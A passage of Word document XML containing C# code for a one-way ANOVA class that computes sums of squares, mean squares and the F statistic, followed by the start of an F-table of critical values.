      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public double </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>Frnk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>{ get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>; set; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065627FD" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public double </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>Prnk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>{ get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>; set; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3248CB16" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        public </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>Anova</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>OneFactorData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>[] groups)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA3CAFB" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAEDDAA" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>dfA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>groups.Length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> - 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727AC4D5" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            foreach (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>OneFactorData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> group in groups)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADE05CE" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6291955D" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                n += </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>group.Length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061BEF6C" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                foreach (double </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>obs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> in group)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BCC584" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF25D7F" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>avgX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> += </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>obs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F9DDC6" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BDF2E3" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261BAEFB" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            df = n - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>groups.Length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1495B9" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>avgX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> /= n;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C09913" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EBD3097" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            foreach (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>OneFactorData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> group in groups)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFDDDA9" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682D56D6" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                int </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>ni</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>group.Length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6943A8" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                double </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>avgXi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17555DCC" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                foreach (double </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>obs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> in group)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FC25D0" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24437A13" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>avgXi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> += </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>obs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAEF8C1" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                    SS += (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>obs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>avgX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>) * (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>obs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>avgX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1289D364" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7F5D8C" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>avgXi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> /= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>ni</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D34A2DE" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>SSa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> += (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>avgXi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>avgX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>) * (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>avgXi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>avgX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">) * </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>ni</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775904C6" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                foreach (double </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>obs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> in group)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D190FE0" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>SSe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> += (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>obs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>avgXi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>) * (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>obs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>avgXi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3582C63D" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FBDF09" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>MSa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>SSa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>dfA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA8440B" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>MSe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>SSe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> / df;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4749DD" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            F = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>MSa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>MSe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E98478" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="718BB99F" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            Dictionary&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>FTableKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">, double&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>Ftable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = new Dictionary&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>FTableKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>, double</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>&gt;(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185CF449" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4114612C" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">        #</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>region</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="45E0A7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1), 161.40},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569452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2), 199.50},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13281FB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3), 215.70},</w:t>
      </w:r>
    </w:p>
